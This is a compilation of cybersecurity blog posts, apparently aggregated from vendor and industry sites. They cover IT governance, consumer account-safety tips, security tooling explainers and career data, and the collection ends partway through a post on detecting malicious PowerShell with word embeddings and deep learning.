The COBIT was established by the Information Systems Audit and Control Association, or ISACA. They published this framework together with the IT Governance Institute, or ITGI.

The Evolution of the COBIT

The COBIT was initially published in the mid-1990s. The focus was mainly on doing audits, specifically on helping financial auditors navigate IT frameworks. Today, it has evolved to doing more than just audits. The third version of the COBIT released by ISACA introduced management guidelines.

The fourth version added guidelines on ICT governance. The latest version used today, released in 2014, focused more on information governance, along with risk management.

Core Principles of the COBIT 5

The COBIT 5, the latest in this series, is centered around five core principles:

  1. Meeting the needs of stakeholders.
  2. Having a comprehensive coverage of the organization.
  3. Creating a single unified framework.
  4. Creating a more holistic approach for business.
  5. Making a distinction between management and governance.

The COBIT Framework Goals

The latest release of the COBIT framework puts together the guidelines from the fourth version, along with Val IT 2.0, and the Risk IT Framework. According to ISACA, these updates are meant to:

  • Streamline information sharing within the organization.
  • Use strategy and IT to achieve business goals.
  • Minimize security risks on information and provide more controls.
  • Provide efficient costing for technology and IT.
  • Integrate recent findings into the COBIT framework.

Companies making use of several frameworks like CMI and ITL will find it easier to govern their IT.

Benefits of the COBIT 5

There are several benefits associated with the COBIT 5. First, it allows you to supervise and manage information security in a more efficient manner. It helps ensure compliance and manage vulnerabilities.

When it comes to risk management, the COBIT 5 allows you to improve on the enterprise risk and keep one step ahead of evolving regulatory compliances.

Framework of the COBIT 5

There are several components that make up the COBIT 5, including:

Main Framework

This creates the basic guidelines, foundation, and best practices related to IT governance. They are then integrated with the needs and requirements of the organization. The main goal of the main framework is to allow the organization to align its goals with its IT.

Process Descriptions

This allows the business to have a reference process model, along with a common language used by each member of the organization. The descriptions cover planning, creating, implementing, and monitoring the processes involved in IT. This helps everyone in the organization understand the processes and terminologies.

Control Objectives

This is where the complete list of requirements can be found for effective control of the processes involved in IT. This can actually help improve all IT processes.

Management Guidelines

These guidelines of the COBIT detail people’s responsibilities and what tasks are expected of them. They also show how to measure the organization’s performance with implementing the COBIT 5.

Maturity Models

These models assess the company’s maturity in terms of coping up with growth. This helps plug the gaps, if found.

The COBIT Certifications

The COBIT 5 certification is available from ISACA, which teaches you all about this framework, along with:

  • How to apply the COBIT 5 in essentially any situation.
  • How to use this with other frameworks.
  • How to understand what challenges this framework addresses.

There are two paths to certification:

  1. Implementation path, which focuses more on the application of the COBIT 5 in business models and challenges.
  2. ASSESSOR path, which focuses more on how to review processes that require change.

The COBIT certification is useful for many companies and roles such as IT directors, managers, audit committee members, and more.

Also Read,

NIST Cybersecurity Framework For Organizations To Follow

Importance of Employee Awareness and Training For Cyber Security

The post What is the COBIT and why you need to know about it appeared first on .

Iron Man’s Instagram Hacked: Snap Away Cybercriminals With These Social Media Tips

Celebrities: they’re just like us! Well, at least in the sense that they still face common cyberthreats. This week, “Avengers: Endgame” actor Robert Downey Jr. was added to the list of celebrities whose social media accounts have been compromised. According to Bleeping Computer, a hacker group managed to take control of the actor’s Instagram account, sharing enticing but phony giveaway announcements.

The offers posted by the hackers included 2,000 iPhone XS devices, MacBook Pro laptops, Tesla cars, and more. In addition to the giveaways added to the actor’s story page, the hackers also changed the link in his account bio, pointing followers to a survey page designed to collect their personal information that could be used for other scams. The tricky part? The hackers posted the link using the URL shortening service Bitly, preventing followers from noticing any clues as to whether the link was malicious or not.

This incident serves as a reminder that anyone with an online account can be vulnerable to a cyberattack, whether you have superpowers or not. In fact, over 22% of internet users reported that their online accounts have been hacked at least once, and more than 14% said that they were hacked more than once. Luckily, there are some best practices you can follow to help keep your accounts safe and sound:

  • Don’t interact with suspicious messages, links, or posts. If you come across posts with offers that seem too good to be true, they probably are. Use your best judgment and don’t click on suspicious messages or links, even if they appear to be posted by a friend.
  • Alert the platform. Flag any scam posts or messages you encounter on social media to the platform so they can stop the threat from spreading.
  • Use good password hygiene. Make sure all of your passwords are strong and unique.
  • Don’t post personal information. Posting personally identifiable information on social media could potentially allow a hacker to guess answers to your security questions or make you an easier target for a cyberattack. Keep your personal information under wraps and turn your account to private.

To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Iron Man’s Instagram Hacked: Snap Away Cybercriminals With These Social Media Tips appeared first on McAfee Blogs.

On Cybersecurity Insurance

Good paper on cybersecurity insurance: both the history and the promise for the future. From the conclusion:

Policy makers have long held high hopes for cyber insurance as a tool for improving security. Unfortunately, the available evidence so far should give policymakers pause. Cyber insurance appears to be a weak form of governance at present. Insurers writing cyber insurance focus more on organisational procedures than technical controls, rarely include basic security procedures in contracts, and offer discounts that only offer a marginal incentive to invest in security. However, the cost of external response services is covered, which suggests insurers believe ex-post responses to be more effective than ex-ante mitigation. (Alternatively, they can more easily translate the costs associated with ex-post responses into manageable claims.)

The private governance role of cyber insurance is limited by market dynamics. Competitive pressures drive a race-to-the-bottom in risk assessment standards and prevent insurers including security procedures in contracts. Policy interventions, such as minimum risk assessment standards, could solve this collective action problem. Policy-holders and brokers could also drive this change by looking to insurers who conduct rigorous assessments. Doing otherwise ensures adverse selection and moral hazard will increase costs for firms with responsible security postures. Moving toward standardised risk assessment via proposal forms or external scans supports the actuarial base in the long-term. But there is a danger policyholders will succumb to Goodhart's law by internalising these metrics and optimising the metric rather than minimising risk. This is particularly likely given these assessments are constructed by private actors with their own incentives. Search-light effects may drive the scores towards being based on what can be measured, not what is important.

EDITED TO ADD (9/11): BoingBoing post.

Defining and Understanding User and Entity Behavior Analytics (UEBA)

User and Entity Behavior Analytics, or UEBA for short, provides you with a comprehensive solution for IT security while helping find and detect any user or anomaly that might be harmful to the network.

Defining UEBA

This is basically a cybersecurity solution that can recognize and essentially remember normal user behavior. As such, it can identify weird or anomalous instances whenever a user or an entity deviates from their regular “pattern.” A good example of this is if a user normally downloads 10MB worth of data in a da, but suddenly starts to download 100GB, the UEBA would detect this as anomalous and flag it.

A great feature of UEBA is that it uses a combination of machine learning, statistical analysis, and complex algorithms in order to detect deviations in patterns that can lead to harmful effects for the entire system. The UEBA can essentially aggregate the data that you have.

The main difference of UEBA is that it does not track events or monitor devices; instead, it tracks the actions of all the organization’s users and its entities. It focuses more on insider threats, which can include rogue employees or those who have been compromised by outside machinations.

Benefits of UEBA

Hackers and malicious attackers are evolving to the point that conventional security tools are fast becoming obsolete. Firewalls, gateways, and intrusion prevention applications can be bypassed now, which is especially true with bigger corporations, since their IT is more complex to maintain and manage.

Detection is now incredibly important, more so than ever, because it is just a matter of time for hackers to figure out your defenses and get into the network. It is up to other systems, such as UEBA, to detect anomalous activities for immediate response and potential threat prevention.

How UEBA Works

The concept of UEBA is quite simple. Hackers can steal usernames and passwords, but it would be difficult for them to mimic an employee’s habits or normal behavior when accessing the company’s network, especially since their intent is to steal rather than to work.

A relatable analogy here is if a thief is able to steal your credit card. That thief would then go on a shopping spree, using your card in retail stores that you do not normally visit. This would trigger the bank’s fraud detection policies.

Because of this, UEBA has proven to be an important part of any organization’s IT security.

  • It can detect insider threats, such as an employee or group of employees who’ve decided to go rogue against the company by stealing data. This can be detected by UEBA.
  • It can detect compromised accounts like in the above example. A hacker may obtain the username and password of an employee and start stealing information. This anomalous behavior can be detected by UEBA.
  • A brute-force attack is a common hacker tool that can be hindered or otherwise prevented by UEBA.
  • It can detect changes in user permissions or the creation of super admins to flag these, especially if they are deemed unnecessary by the system.
  • UEBA can prevent unauthorized access of sensitive and protected data, limiting access to only those who actually need said data.

Best Practices of UEBA

UEBA was established due to the malicious behavior of users and other entities. It  is not meant to replace other monitoring systems but  to complement them instead, which enhances your organization’s overall security.

It is a great idea to harness Big Data, statistical analysis, and mechanical learning in order to prevent a huge increase in useless alerts due to the large amount of data generated.

UEBA essentially helps you take a more proactive approach in IT security and threat detection. It creates a layer of protection against malicious attacks. And as they say, prevention is always better than a cure.

Also Read,

It Should be Cybersecurity and not IT security

IT Security Procedures You Should Not Forget After Electronic Gadget Shopping

IT Security Culture Evolution of Businesses Exposed

The post Defining and Understanding User and Entity Behavior Analytics (UEBA) appeared first on .

Memory Forensics: The Key to Better Cybersecurity

When companies fall victim to a cyberattack, the first thing they do is eliminate the threat. But for cybersecurity investigators, that’s just the first part of their job. Like real-world investigators, cybersecurity experts need to gather and analyze evidence of the attack to improve cybersecurity policies or to present it in court during a hearing. Cyber investigators do their evidence gathering through memory forensics.

What Is Memory Forensics?

Memory forensics is the process of collecting memory dumps and analyzing them for evidence of how a cybercrime happened or to find the origins of a malware breach. This is usually done after a cyberattack, but cybersecurity specialists can also do this as a routine check-up for malicious injections that could be running in the system.

Memory forensics is a way to backtrack events that led to a successful security breach and to help specialists know how to improve their company’s cybersecurity.

What Is Memory Forensics? — How Is Memory Forensics Done?

 Memory forensics, also known as memory analysis, can be broken down into three parts: retrieval, analysis, and documentation.

  1. Retrieval

The first part of memory forensics is the retrieval phase. Because all activities done and actions taken in a computer are recorded in the system’s memory, cyber investigators need to retrieve the system memory to see when and where the cyberattack began. It’s like retrieving an airplane’s black box after a crash.

To retrieve the system’s memory, cyber investigators perform a memory dump. This is a procedure where data in a system’s RAM is read and transferred to a storage device. Retrieving RAM data is important, since this is “volatile” data, meaning that it is only retained when the system is on and disappears once the system is turned off.

If there is no cyberattack or breach, memory dumps can help IT specialists understand a crash event and how it happened. There are many kinds of memory dump tools available in the market.

  1. Analysis

 The second phase is memory analysis. This is the part where cyber investigators look through the system’s memory dump for signs of malicious activities. Investigators take memory analysis seriously, and they will search for hidden folders and retrieve deleted or encrypted files.

Memory analysis can take days or months to complete. Retrieved memory dumps are examined using different analyzing tools and software.

  1. Documentation

 The last phase of memory forensics is the documentation phase. All pieces of evidence and significant activities discovered during memory analysis are recorded. Once the collected memory dumps are thoroughly analyzed, investigators take note of every detail of the event and carefully create a report.

This report is then validated by running tests on the system and checking for inconsistencies. After validation, the report is ready for presentation in court and other legal proceedings or to company management to help improve cybersecurity.

Conclusion

 No matter how strong a company’s cybersecurity is, they can still be victims of a cyberattack. And when that happens, it’s crucial to know when and how the cyberattack happened so vulnerabilities can be addressed and cybercriminals can be tracked down.

If you’re worried about your cybersecurity, now is a good time to do your own memory forensics to see if you have been compromised.

Related Blogs:

What You Need to Know About Cloud Forensics

Top 10 Computer Forensics Tools For Analyzing A Breach

 

The post Memory Forensics: The Key to Better Cybersecurity appeared first on .

Attention Facebook Users: Here’s What You Need to Know About the Recent Breach

With over 2.4 billion monthly active users, Facebook is the biggest social network worldwide. And with so many users come tons of data, including some personal information that may now potentially be exposed. According to TechCrunch, a security researcher found an online database exposing 419 million user phone numbers linked to Facebook accounts.

It appears that the exposed server wasn’t password-protected, meaning that anyone with internet access could find the database. This server held records containing a user’s unique Facebook ID and the phone number associated with the account. In some cases, records also revealed the user’s name, gender, and location by country. TechCrunch was able to verify several records in the database by matching a known Facebook user’s phone number with their listed Facebook ID. Additionally, TechCrunch was able to match some phone numbers against Facebook’s password reset feature, which partially reveals a user’s phone number linked to their account.

It’s been over a year since Facebook restricted public access to users’ phone numbers. And although the owner of the database wasn’t found, it was pulled offline after the web host was contacted. Even though there has been no evidence that the Facebook accounts were compromised as a result of this breach, it’s important for users to do everything they can to protect their data. Here are some tips to keep in your cybersecurity arsenal:

  • Change your password. Most people will rotate between the same three passwords for all of their accounts. While this makes it easier to remember your credentials, it also makes it easier for hackers to access more than one of your accounts. Try using a unique password for every one of your accounts or employ a password manager.
  • Enable two-factor authentication. While a strong and unique password is a good first line of defense, enabling app-based two-factor authentication across your accounts will help your cause by providing an added layer of security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Attention Facebook Users: Here’s What You Need to Know About the Recent Breach appeared first on McAfee Blogs.

What Is an Intrusion Prevention System?

When you need a tool to find and detect malicious activity within a network, an intrusion prevention system (IPS) fills that role. They first detect any malicious activities in the network, create a report on the information, and try to block or stop it from further operating.

An intrusion prevention system expands the capabilities of an intrusion detection system (IDS), which monitors network and systems traffic. The advantage of an IPS over an IDS is the fact that these are found in-line, at the path of the source and the destination, and can block malicious activities from occurring in the network.

How Do Intrusion Prevention Systems Work?

Usually found behind a firewall, an intrusion prevention system functions as an additional layer of filtering for malicious activities. If something gets through the firewall, the IPS is there to catch it. They are capable of analyzing and taking action on network traffic. Actions include sending out alerts to admins, dropping potentially dangerous packets, stopping traffic from a source of malicious activities, and even restarting connections.

It is important to note, however, that an IPS should be efficient so it does not hinder the performance of a network. At the same time, the intrusion prevention system should be able to act quickly and accurately to catch malicious activities in real time and detect false positives.

How an Intrusion Prevention System Detects Malicious Activities

There are several ways that an intrusion prevention system can find and detect malicious activities. The two main methods are statistical anomaly-based detection and signature-based detection.

Signature-based detection involves using a dictionary of identifiable signatures, located in the code of an exploit. This can be categorized further to two more methods: vulnerability-facing and exploit-facing. The first detects malicious activities based on specific network vulnerabilities, while the second one checks for common attack patterns.

For statistical anomaly-based detection, intrusion prevention systems use random samples of network traffic, then compare them to predetermined baseline performance levels. If something is off, it will then send out an alert or take action.

Comparing Intrusion Prevention Systems

There are four common types of an intrusion prevention system. First is the network-based intrusion prevention system, which has the ability to check and monitor the entire network to look for suspicious activities based on protocol activity.

A wireless intrusion prevention system, on the other hand, checks wireless security protocols to catch anomalies and suspicious activities.

Network behavior analysis checks the network traffic flow for unusual activities such as a spike in traffic or anything that may seem different, like a DDoS attack.

The final common type is the host-based intrusion prevention system, which is an installed software that checks a single host for suspicious activities.

Which Intrusion Prevention System to Use?

There are many offerings when it comes to intrusion prevention system. To help choose the best one, it is best to set a budget first, define the requirements of your network, and then research the different systems available in the market to see if they fit what you need.

Remember, an intrusion prevention system is not a comprehensive security solution. While it can be a valuable asset in any organization’s security to detect malicious activities, other tools are needed for endpoint security, data protection, incident responses, and more.

Also Read,

The Highly Competitive Web Application Firewall Market

On Firewalls and Their Role in Enterprise Security

What is the Difference between a Firewall, Router & Secure Web Gateway

The post What Is an Intrusion Prevention System? appeared first on .

iPhone Users: Here’s What You Need to Know About the Latest iOS Hacks

iPhone hacks have often been considered by some to be a rare occurrence. However, a group of Google researchers recently discovered that someone has been exploiting multiple iPhone vulnerabilities for the last two years. How? Simply by getting users to visit a website.

How exactly does this exploitation campaign work? According to WIRED, researchers revealed a handful of websites that had assembled five exploit chains. These exploit chains are tools that link security vulnerabilities together and allow a hacker to penetrate each layer of iOS digital protections. This campaign took advantage of 14 security flaws, resulting in the attacker gaining complete control over a user’s phone. Researchers state that these malicious sites were programmed to assess the Apple devices that loaded them and compromise the devices with powerful monitoring malware if possible. Once the malware was installed, it could monitor live location data, grab photos, contacts, passwords, or other sensitive information from the iOS Keychain.

So, what makes this attack unique? For starters, this exploitation campaign hides in plain sight, uploading information without any encryption. If a user monitored their network traffic, they would notice activity as their data was being uploaded to the hacker’s server. Additionally, a user would be able to see suspicious activity if they connected their device to their computer and reviewed console logs. Console logs show the codes for the programs being run on the device. However, since this method would require a user to take the extra step of plugging their iPhone into a computer, it’s highly unlikely that they would notice the suspicious activity.

Although iOS exploits usually require a variety of complexities to be successful, this exploitation campaign proves that iOS hacking is very much alive and kicking. So, what can Apple users do to help ward off these kinds of attacks? Here’s how you can help keep your device secure:

  • Install automatic updates. In your device settings, choose to have automatic updates installed on your device. This will ensure that you have the latest security patches for vulnerabilities like the ones leveraged in these exploit chains as soon as they’re available.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post iPhone Users: Here’s What You Need to Know About the Latest iOS Hacks appeared first on McAfee Blogs.

Introduction to “Is Your Digital Front Door Unlocked?” a book by Gary Davis

“Is Your Digital Front Door Unlocked?” explores the modern implications of our human nature: our inherent inclination to share our experiences, specifically on the internet. Our increasing reliance on technology to connect with others has us sharing far more information about ourselves than we realize, and without a full understanding of the risks involved.

While we’re posting innocent poolside pictures, we’re also creating a collection of highly personal information. And not just on social media. It happens by simply going about our day. Whether it is the computers we use for work and play, the smartphones that are nearly always within arm’s reach, or the digital assistants that field household requests—all of these devices capture and share data about our habits, our interests, and even our comings and goings. Yet we largely don’t know it’s happening—or, for that matter, with whom we’re sharing this information, and to what end.

I wrote this book for anyone who wants to live online as safely and privately as possible, for the sake of themselves and their family. And that should be plenty of us. With news of data breaches, companies sharing our personal information without our knowledge, and cybercrime robbing the global economy of an estimated $600 billion a year, it’s easy to feel helpless. But we’re not. There are things we can do. It’s time to understand how we’re creating all this personal information so we can control its flow, and who has access to it. The book takes an even-handed look at the most prevalent privacy and security challenges facing individuals and families today. It skips the scare tactics that can dominate the topic, and illustrates the steps each of us can take to lead more private and secure lives in an increasingly connected world.

The notion that binds the book together is the idea of a personal data lake. “Data lake” is a widely used term in business to reflect a large repository of data that companies collect and store. In the book I explore how we create personal data lakes as we go about our digital lives. I explore how our data lakes fill as we do more and more activities online, and offer insights that can be used to protect our personal data lakes, so that we can live more privately and enjoy safe online experiences.

This book is for people in families of any size or structure. It looks at security and privacy across the stages of life, and explores the roles each of us play in those stages, from birth to the time we eventually leave a digital legacy behind, along with important milestones and transitional periods in between. You’ll see how security and privacy are pertinent at every step of your digital journey, and how specific age groups have concerns that are often unique to that stage of life. The structure allows you to easily navigate to the chapters and sections that most relate to the life stage you are in, and offers guidance.

This book, like most things in life, is about choice. You can choose to roll the dice and hope that you’re not one of the hundreds of millions who are victims each year of phishing scams, ransomware attacks, and identity theft, or among the handful of people who still fall for the Nigerian prince lottery scam. You can also choose to use your computers, tablets, smartphones, and personal assistants as you have been, letting companies grift all kinds of personal information from you, without your knowledge or consent. Or you can choose to embrace the guidelines outlined in the book and make it extremely more difficult for a bad actor or cybercriminal to make you or your loved ones a victim.

Gary Davis’ book, Is Your Digital Front Door Unlocked?, is available September 5, 2019 and can be ordered at amazon.com.

The post Introduction to “Is Your Digital Front Door Unlocked?” a book by Gary Davis appeared first on McAfee Blogs.

Cybersecurity to be the biggest threat to the enterprise for the next decade

Estimated reading time: 3 minutes

Ernst & Young (EY) conducted a CEO imperative survey and gathered exclusive insights from 200 global CEOs and some of Forbes’ largest private players about what they thought will be the biggest problem for businesses in the coming years? The professional services giant asked the same question to 100 senior investors that have managed at least $100 billion worth of assets.The result – the elite group of participants overwhelmingly voted for cybersecurity to be the biggest threat for the enterprise in the next five to ten years.

Seqrite is in agreement with the report and while stakeholders are thinking right, they are not fully understanding the gravity of the situation, at least not yet.

As per our findings for Q1 – 2019 that Seqrite released through a periodic threat report recently, our labs detected 28 million malware to penetrate Windows Operating Systems, and this is just for three months.

Cyber attackers are always trying to stay one step ahead when it comes to designing malware that can outsmart the best cybersecurity systems. Recent examples of malware such as Emotet and TrickBot are classic use cases of how sophisticated and complex malware is evolving into.

If enterprises have to consider cyberattacks as the main problem here, stakeholders need to look at the mediums through which malware penetrates into a business network. So here, we have a host of channels such as emails, content collaboration platforms, office messengers, social media, websites, etc.

Today’s times are times of digital transformation. More and more organizations are going digital by lightning speeds. This change is dynamically required for every business for a number of reasons some of which are –

  • To stay at par with the competition
  • To be efficient and agile
  • To be fast and to be in sync with how everybody is doing business today

Hence, the aforementioned penetration channels are in reality the core component of an enterprise’s initiative for digitalization. Hackers know that businesses cannot function without digital mediums and this is where most attacks are happening nowadays. Compare this to a couple of decades back where businesses were alien to cyberattacks as digitalization was at its minimum.

  • Businesses that have experienced cyberattacks on operational technology infrastructure – 31%
  • On average, companies lose $2.4 million after a malware attack with up to 50 days of downtime
  • By 2021, cyberattacks are expected to damage the global economy by $6 trillion

Maybe large corporations can recover from this – however, for SMBs and SOHOs the impact of such an attack is going to be back-breaking. CXOs everywhere need to think more about when an attack will happen rather than if it will. This automatically transforms cyberthreats to be more of a business problem than an IT problem.

CTOs and CISOs largely come in the picture here. Secondly, budget re-alignments automatically get highlighted to prioritize more on safeguarding the enterprise. So far, budget allocations have been biased towards enterprise domains such as marketing, sales and IT. This needs to change and cybersecurity needs to receive a substantial chunk of annual budgets.

As for technology officers in the company, they need to start implementing simple but effective methods to secure business networks from cyberattacks.

Secure endpoints, networks, and data

Collaborating with a proven cybersecurity expert is always favourable then procuring an in-house team to fence an enterprises’ Information Technology Infrastructure. CTOs and CISOs should opt for a single solution that encapsulates securing every digital medium made available for the enterprise.

Review cybersecurity readiness of the employees periodically

The biggest threat to enterprise data is its employees. It’s not like employees are making mistakes while knowing that they are doing so. Innocent mistakes happen and with the increasing culture of BYOD and CYOD, critical business data is at risk. Hence, reviewing the cybersecurity readiness of employees periodically is important.

Conduct third-party audits to avoid supply chain attacks

Hacker tendency is such that they will always try and attack the weakest links in an enterprise. Supply chain attacks can happen in any industry and third-party audits act as medical tests to understand if these systems are sick, beforehand.

Have an action plan in place and prepare for the worst-case scenario

CXOs need to zero in on contingency plans in case of an attack. Designing protocols and business continuity processes in case of an attack event helps in ensuring the status quo of an enterprise.

Seqrite is one of the best-in-class cybersecurity solutions that enterprises can leverage on for an invincible cybersecurity system. Cyberattacks are here to stay with hackers finding varied ways to attack networks, more so jumping on to the gold rush created by cyber attacks pertaining to cryptocurrency, data theft, and financial information. With an entourage of CEOs agreeing to the dangers of cybercrimes, enterprises should act now!

The post Cybersecurity to be the biggest threat to the enterprise for the next decade appeared first on Seqrite Blog.

A Guide to Cyber Security Salary

In 2020, it is expected that the cyber security market will be around $170 billion. The Burning Glass Technologies Research provides data from 2015, which shows that the cyber security salary is about 9% more than other IT workers. However, there remains a lack of qualified professionals in this field. The workforce gap between cybersecurity professionals will reach around 1.8 million in 2022.

The CEO of ISC² David Shearer said in a press conference that 66% of workers know that they have far too few qualified workers ready to combat the current threats in the industry; another research shows a similar finding, wherein there is truly a shortage of cybersecurity professionals making a cyber security salary.

In the U.S., there were about 780,000 cybersecurity professionals with a cyber security salary in 2017. There were 350,000 job openings and a 0% unemployment rate for this field. This is impressive for any industry.

There is a growing need for experienced cybersecurity personnel. This just shows that there is tremendous potential in this field, including cyber security salary, job security, and advancement. Based on the analysis of data from the Bureau of Labor Statistics, there are 74% more job postings for cybersecurity.

Most Popular Cybersecurity Roles

There are many options for IT professionals to pursue a career in the field of cybersecurity and make a cyber security salary. They need strong communication skills, along with good knowledge of the threat landscape and the technologies and tools that are used by cybersecurity teams in order to detect, mitigate, and prevent threats.

If you want to proceed with this field, here are a few of the roles that are in high demand:

Security Architect

These are the people who put themselves in the shoes of a hacker to find ways to attack so they can prevent those types of attacks. They also maintain the enterprise computer system security. They should always be updated with the latest news and technologies in the industry.

Malware Analyst

There has been a rapid rise in ransomware attacks in the past few years. The role of the malware analyst is to defend against these threats. An example is the WannaCry ransomware attack that resulted in $4 billion in losses.

IT Security Engineer

This role focuses on the quality control of IT environments so security measures are in place to address threats.

Security Software Developer

There is a never-ending need for developers who can create tools, programs, and software to counter what hackers do.

Security Systems Administrator

This is who is responsible for defending the network and systems from unauthorized access and creating the requirements for security.

Data Security Strategist

More and more enterprises are moving toward AI, and this has led to a rise in demand for data security strategists because they focus on efficient data security functions and storage. They also help in creating policies for stored data.

Becoming a Cybersecurity Professional

Most of the cybersecurity professionals actually start out in the field as ethical hackers. They recognize how easy it is to hack into vulnerable systems, so they translate this knowledge into software and policies that can help protect endpoints, networks, and applications.

Others gain knowledge through joining different organizations or even the military, which has some of the highest standards when it comes to cybersecurity.

In order to advance in the career of cybersecurity and make a good cyber security salary, you need to:

Ask Questions

There is no single professional in the security business who knows it all. With the rapid pace of new threats and technologies, there is no one person who would have all the available information.

Promote your Work

Good security work can sometimes go unnoticed. People who are outside the IT industry do not understand the importance of what you do and why security policies are important. So, you need to take the lead in promoting these policies in the organization.

Communicate

This is a very technical field, but you should not speak in jargon when you are talking about threats and security needs to employees and other departments, so they understand key policies and processes.

Keep Learning

It is important to keep up with every evolving threats and technologies so you know how best to defend the organization.

Educational and Background Requirements

There are several degree options that you can study in order to become a proper cybersecurity professional and make a good cyber security salary:

  • Internet security.
  • Computer forensics.
  • Cryptography.
  • Data recovery.

There are certifications you can take as well, such as:

  • CISA.
  • CISM.
  • CISSP.
  • Certified Penetration Tester.
  • Certified Ethical Hacker.
  • Certified Computer Forensics Examiner.

Cyber Security Salary

Based on recent data, the average annual cyber security salary from 15 cities in the United States are the following:

  1. Minneapolis: $127,757.
  2. Seattle: $119,349.
  3. San Francisco: $119,346.
  4. Dallas: $117,890.
  5. Denver: $117,308.
  6. Chicago: $111,303.
  7. Austin: $110,190.
  8. Salt Lake City: $106,207.
  9. New York: $102,271.
  10. San Jose: $99,075.
  11. San Diego: $98,303.
  12. Washington: $92,191.
  13. Boston: $88,453.
  14. Los Angeles: $86,072.
  15. Arlington: $74,254.

While salaries can vary based on location, role, experience level, and company, it is obvious that cyber security professionals are in high demand and are compensated properly with a cyber security salary. As the landscape of threats continue to expand, more and more security professionals are needed to create policies, tools, and applications to keep modern enterprises safe.

Also Read,

The Role of a vCISO in Enterprise Security

Why Cybersecurity Recruitment On The Rise?

Australia’s Shortage of Cybersecurity Professionals, Highlighted by the Government

The post A Guide to Cyber Security Salary appeared first on .

Deep learning rises: New methods for detecting malicious PowerShell

Scientific and technological advancements in deep learning, a category of algorithms within the larger framework of machine learning, provide new opportunities for development of state-of-the art protection technologies. Deep learning methods are impressively outperforming traditional methods on such tasks as image and text classification. With these developments, there’s great potential for building novel threat detection methods using deep learning.

Machine learning algorithms work with numbers, so objects like images, documents, or emails are converted into numerical form through a step called feature engineering, which, in traditional machine learning methods, requires a significant amount of human effort. With deep learning, algorithms can operate on relatively raw data and extract features without human intervention.

At Microsoft, we make significant investments in pioneering machine learning that inform our security solutions with actionable knowledge through data, helping deliver intelligent, accurate, and real-time protection against a wide range of threats. In this blog, we present an example of a deep learning technique that was initially developed for natural language processing (NLP) and now adopted and applied to expand our coverage of detecting malicious PowerShell scripts, which continue to be a critical attack vector. These deep learning-based detections add to the industry-leading endpoint detection and response capabilities in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP).

Word embedding in natural language processing

Keeping in mind that our goal is to classify PowerShell scripts, we briefly look at how text classification is approached in the domain of natural language processing. An important step is to convert words to vectors (tuples of numbers) that can be consumed by machine learning algorithms. A basic approach, known as one-hot encoding, first assigns a unique integer to each word in the vocabulary, then represents each word as a vector of 0s, with 1 at the integer index corresponding to that word. Although useful in many cases, the one-hot encoding has significant flaws. A major issue is that all words are equidistant from each other, and semantic relations between words are not reflected in geometric relations between the corresponding vectors.

Contextual embedding is a more recent approach that overcomes these limitations by learning compact representations of words from data under the assumption that words that frequently appear in similar context tend to bear similar meaning. The embedding is trained on large textual datasets like Wikipedia. The Word2vec algorithm, an implementation of this technique, is famous not only for translating semantic similarity of words to geometric similarity of vectors, but also for preserving polarity relations between words. For example, in Word2vec representation:

Madrid – Spain + Italy ≈ Rome

Embedding of PowerShell scripts

Since training a good embedding requires a significant amount of data, we used a large and diverse corpus of 386K distinct unlabeled PowerShell scripts. The Word2vec algorithm, which is typically used with human languages, provides similarly meaningful results when applied to PowerShell language. To accomplish this, we split the PowerShell scripts into tokens, which then allowed us to use the Word2vec algorithm to assign a vectorial representation to each token .

Figure 1 shows a 2-dimensional visualization of the vector representations of 5,000 randomly selected tokens, with some tokens of interest highlighted. Note how semantically similar tokens are placed near each other. For example, the vectors representing -eq, -ne and -gt, which in PowerShell are aliases for “equal”, “not-equal” and “greater-than”, respectively, are clustered together. Similarly, the vectors representing the allSigned, remoteSigned, bypass, and unrestricted tokens, all of which are valid values for the execution policy setting in PowerShell, are clustered together.

Figure 1. 2D visualization of 5,000 tokens using Word2vec

Examining the vector representations of the tokens, we found a few additional interesting relationships.

Token similarity: Using the Word2vec representation of tokens, we can identify commands in PowerShell that have an alias. In many cases, the token closest to a given command is its alias. For example, the representations of the token Invoke-Expression and its alias IEX are closest to each other. Two additional examples of this phenomenon are the Invoke-WebRequest and its alias IWR, and the Get-ChildItem command and its alias GCI.

We also measured distances within sets of several tokens. Consider, for example, the four tokens $i, $j, $k and $true (see the right side of Figure 2). The first three are usually used to represent a numeric variable and the last naturally represents a Boolean constant. As expected, the $true token mismatched the others – it was the farthest (using the Euclidean distance) from the center of mass of the group.

More specific to the semantics of PowerShell in cybersecurity, we checked the representations of the tokens: bypass, normal, minimized, maximized, and hidden (see the left side of Figure 2). While the first token is a legal value for the ExecutionPolicy flag in PowerShell, the rest are legal values for the WindowStyle flag. As expected, the vector representation of bypass was the farthest from the center of mass of the vectors representing all other four tokens.

Figure 2. 3D visualization of selected tokens

Linear Relationships: Since Word2vec preserves linear relationships, computing linear combinations of the vectorial representations results in semantically meaningful results. Below are a few interesting relationships we found:

high – $false + $true ≈’ low
‘-eq’ – $false + $true ‘≈ ‘-neq’
DownloadFile – $destfile + $str ≈’ DownloadString ‘
Export-CSV’ – $csv + $html ‘≈ ‘ConvertTo-html’
‘Get-Process’-$processes+$services ‘≈ ‘Get-Service’

In each of the above expressions, the sign ≈ signifies that the vector on the right side is the closest (among all the vectors representing tokens in the vocabulary) to the vector that is the result of the computation on the left side.

Detection of malicious PowerShell scripts with deep learning

We used the Word2vec embedding of the PowerShell language presented in the previous section to train deep learning models capable of detecting malicious PowerShell scripts. The classification model is trained and validated using a large dataset of PowerShell scripts that are labeled “clean” or “malicious,” while the embeddings are trained on unlabeled data. The flow is presented in Figure 3.

Figure 3 High-level overview of our model generation process

Using GPU computing in Microsoft Azure, we experimented with a variety of deep learning and traditional ML models. The best performing deep learning model increases the coverage (for a fixed low FP rate of 0.1%) by 22 percentage points compared to traditional ML models. This model, presented in Figure 4, combines several deep learning building blocks such as Convolutional Neural Networks (CNNs) and Long Short-Term Memory Recurrent Neural Networks (LSTM-RNN). Neural networks are ML algorithms inspired by biological neural systems like the human brain. In addition to the pretrained embedding described here, the model is provided with character-level embedding of the script.

Figure 4 Network architecture of the best performing model

Real-world application of deep learning to detecting malicious PowerShell

